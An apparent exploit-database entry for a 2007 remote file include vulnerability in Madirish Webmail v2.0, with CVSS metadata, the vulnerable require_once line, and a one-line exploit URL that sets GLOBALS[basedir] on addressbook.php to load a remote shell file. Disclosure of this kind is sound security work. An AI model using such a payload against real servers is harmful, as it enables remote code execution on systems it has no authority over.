header-logo
Suggest Exploit
vendor:
Webmail
by:
BoZKuRTSeRDaR
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Webmail
Affected Version From: Madirish Webmail v2.0
Affected Version To: Madirish Webmail v2.0
Patch Exists: NO
Related CWE:
CPE: a:madirish:webmail:2.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

Madirish Webmail v2.0 Remote File Include Vulnerabilities

The vulnerability allows remote attackers to include arbitrary files via a specially crafted URL in the addressbook.php script.

Mitigation:

Apply the latest patch or upgrade to a newer version of Madirish Webmail.
Source

Exploit-DB raw data:

###########################################################

Madirish Webmail v2.0  Remote File Include Vulnerabilities

Author : BoZKuRTSeRDaR

Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM

My Homepage :WwW.Turkmilliyetcileri.OrG

script Download : http://sourceforge.net/projects/madirishwebmail

###############################################################################

code:
require_once($GLOBALS['basedir']."lib/sql.php")

exploit:

http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?

# milw0rm.com [2007-06-04]